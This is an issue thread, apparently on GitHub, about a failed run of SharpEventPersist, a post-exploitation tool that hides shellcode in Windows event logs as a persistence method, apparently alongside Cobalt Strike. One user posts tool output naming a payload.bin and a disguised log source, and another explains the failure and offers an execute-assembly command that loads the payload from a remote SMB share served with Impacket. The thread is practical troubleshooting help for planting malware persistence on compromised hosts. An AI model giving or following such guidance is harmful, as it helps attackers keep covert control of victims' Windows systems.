hello,
Opened this issue · 1 comments
ZHOUXINGXING9 commented
Using shellcode: C:\Users\Administrator\Desktop\payload.bin
Setting event log instance id: 1337
Setting event log source to: Cobaltstrick
Setting event log to: Key Management Service
[-] Invoke_3 on EntryPoint failed.
why?
roobixx commented
Is the payload binary on the target at C:\Users\Adminsitrator\Desktop\payload.bin? If not, it will fail because SharpEventPersist looks at the file path on the target it is running.
If you want to host your payload remotely, you could do something like this:
execute-assembly /home/rbx/payload.bin -file \\<IP>\Share\payload.bin
Where the IP is a SMB sever with your payload. I used Impactet's SMBserver for my testing and it worked well..
